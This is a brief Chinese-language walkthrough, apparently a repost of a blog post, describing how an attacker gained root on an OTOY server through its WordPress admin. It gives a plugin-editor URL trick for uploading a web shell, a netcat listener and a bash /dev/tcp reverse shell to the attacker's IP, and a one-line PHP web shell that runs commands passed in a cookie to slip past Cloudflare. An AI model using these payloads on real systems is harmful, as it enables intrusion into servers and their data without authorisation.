如何獲取OTOY服務器root權限的

0x1:    獲取帳戶密碼

    注入獲取賬號密碼登陸wordpress網站後臺(略過).

0x2:    上傳webshell

        1.Media Uploader: wordpress新版本中很長時間都不可用.

        2.Themes Editor: 沒有寫入權限.

        3.Plugin Editor:    插件編輯沒法激活

           There was something called (inactive files) for Plugins files, If you tried to edit a file of the plugin, Only the plugin main file will be on active mode, all other files will be marked as Inactive mode, and If you edited the main file, The plugin will be deactivated and then you’ll not be able to see it on plugins again.

        4.尋找現有插件的漏洞

0x3:    繞過插件限制上傳webshell

plugin-editor.php?file=index.php&plugin=index.php

0x4:    反彈shell

           反彈被Cloudflare防火牆攔截

nc -l -vvv -p 443
bash -i >& /dev/tcp/$myip/443 0>&1

                                            

0x5:    繞過Cloudflare防火牆反彈shell

          經過cookies來傳遞執行的命令請求

<?php
system($_COOKIE[‘cmd’]);

Cookie: cmd=bash -i >& /dev/tcp/$myip/443 0>&1

0x6:    Done ;)

        原文連接：http://pwnrules.com/otoy-server-rooted/